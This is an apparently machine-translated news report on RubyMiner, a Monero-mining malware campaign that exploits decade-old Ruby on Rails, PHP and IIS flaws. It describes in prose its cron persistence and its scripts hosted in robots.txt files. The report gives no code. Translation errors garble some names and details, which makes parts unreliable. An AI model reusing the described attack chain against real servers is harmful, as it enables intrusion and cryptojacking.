Note: The Monroe coin mining machine has targeted Linux and Windows servers.

Note: The Monroe coin mining machine has targeted Linux and Windows servers.

Check Point and Certego release report pointed out that recently the new cryptocurrency mining malware RubyMiner has used a number of vulnerabilities to search for old Web servers online and attempt to infect the target.

Attackers target Linux and Windows servers.

Stefan Tanase, an Ixia security researcher, said RubyMiner used the Web server identification tool p0f to scan and identify Linux and Windows servers running outdated software. Once an unpatched server is identified, attackers can exploit known vulnerabilities to intrude into the server and use RubyMiner to further infect the target.

Check Point and Ixia said they found that attackers deployed the following vulnerabilities during the recent attack:

Ruby on Rails XML processor YAML deserialization Code Execution Vulnerability (CVE-2013-0156)

PHP php-cgi query string parameter Code Execution Vulnerability (CVE-2012-1823, CVE-2012-2311, CVE-2012-2335, CVE-2012-2336, CVE-2013-4878)

Microsoft iis asp script source code leakage Vulnerability (CVE-2005-2678)

Obviously, RubyMiner targets Windows and Linux systems.

Attackers can hide the malicious code in the robots.txt file.

Based on the data collected by the honeypot, Check Point cracked the infected program of RubyMiner on Linux, and concluded that:

Vulnerabilities include a series of Shell commands;

Attackers cleared all Cron scheduled tasks;

The attacker adds Cron scheduled tasks to be executed hourly;

Download the online hosting script for the new Cron scheduled task;

The scripts are stored in the robots.txt file of different domain names;

The script downloads and installs the modified XMRig Monroe coin Mining application.

Check Point security researcher letum fenkelstan said they found that attackers targeted Windows IIS servers, but have not yet obtained a copy of the malware for Windows.

The cause of the attack was discovered. It was because the attacker used to hide the malicious command to a domain name of robots.txt (lochjol [.] com) that was used in a malware attack in 2013. The latter also uses the Ruby on Rails vulnerability deployed by RubyMiner, which indicates that these attacks are carried out by the same organization.

RubyMiner has infected 700 servers

According to Check Point estimates, there are about 700 servers infected with RubyMiner. From the wallet addresses found in the Custom mining program deployed by RubyMiner, attackers earned about $540.

Researchers believe that the success rate will be higher if attackers exploit the latest vulnerability, not the one that was discovered 10 years ago. For example, a recent media report said that in October 2017, attackers used the Oracle WebLogic Server to earn $0.226 million.

Monroe coin mining malware continues to increase

In recent months, bitcoin mining attempts have been rampant, especially the Monroe coin mining malware. In addition to the Monroe coin hijacking incident, in 2017, a large number of Monroe coin mining malware emerged, including Digmine, Hexmen, Loapi, Zealot, WaterMiner, CodeFork, and Bondnet. Researchers discovered the malware PyCryptoMiner for Linux servers two weeks in early 2018. In addition, the researchers found that hackers exploit the Oracle WebLogic vulnerability to exploit the Monroe currency.

In most of the above-mentioned mining attacks targeting Web servers, attackers attempt to exploit the latest vulnerabilities. However, RubyMiner is special because attackers exploit very old vulnerabilities. Fenkerstan said that attackers may have been deliberately searching for PCs forgotten by system administrators on the network and using older versions of servers. Infection with these devices means long-term potential mining.